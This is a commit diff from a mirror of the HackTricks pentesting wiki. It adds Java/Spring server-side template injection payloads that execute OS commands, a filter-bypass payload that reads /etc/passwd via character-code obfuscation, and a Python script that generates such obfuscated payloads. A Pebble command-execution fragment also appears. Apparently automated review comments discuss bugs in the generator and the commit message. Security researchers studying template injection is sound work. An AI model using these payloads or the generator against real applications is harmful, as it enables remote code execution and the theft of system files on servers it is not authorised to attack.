mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
Added Springboot payload
Added spring boot payload generator script
This commit is contained in:
parent
e7323dcd0d
commit
4fc733fbde
1 changed files with 37 additions and 5 deletions
@ -249,7 +249,44 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
**Bypass filters**
Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
- Read `/etc/passwd`
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
- Custom Script for payload generation
```python
#!/usr/bin/python3
## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"
from sys import argv
cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'
count = 1
for i in converted:
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1
print(base_payload + end_payload)
```
**More Information**
- [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
- [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)
### Spring View Manipulation (Java)
```java
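Review bot: the generator in the `Custom Script for payload generation` block emits an unbalanced expression when the command is a single character: with `len(converted) == 1` the `count == 1` branch appends `(T(java.lang.Character).toString({i}).concat` and the `elif count == len(converted)` branch is never reached, so the output ends in `.concat.getInputStream())}`. Iterating with `for idx, i in enumerate(converted)` and closing the expression on the last index (or special-casing a one-element list) avoids this, and `argv[1]` should be guarded with a `len(argv) < 2` check that prints the documented usage instead of raising `IndexError`. The script also hardcodes the `*{...}` delimiter while the `Read /etc/passwd` bullet above it uses `${...}`; taking the delimiter as an argument would match the `Bypass filters` advice that several delimiters may need to be tried. Minor: `print("Payload: ", cmd, end="\n\n")` prints the list of characters rather than the command string, and the link text `Thymleaf SSTI` under `**More Information**` should read `Thymeleaf`.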
@ -280,11 +317,6 @@ New version of Pebble :
{% set cmd = 'id' %}
{% endraw %}
{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
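Review bot: this hunk only removes lines (11 → 6) from the Pebble `New version of Pebble` block, which the commit message `Added spring boot payload generator script` does not mention; either document the Pebble cleanup in the message or split it into its own commit. It is also worth confirming that the removed run is only the blank lines between `{% endraw %}` and `{% set bytes = (1).TYPE`, since the `{% raw %}` that pairs with the visible `{% endraw %}` lies outside the shown context and an accidental deletion there would break the template. Separately, the surviving `.methods[6]` selects a method from `getMethods()` by position, and that array has no guaranteed ordering across JVM builds, so a short note beside the payload that the index may need adjusting would help readers.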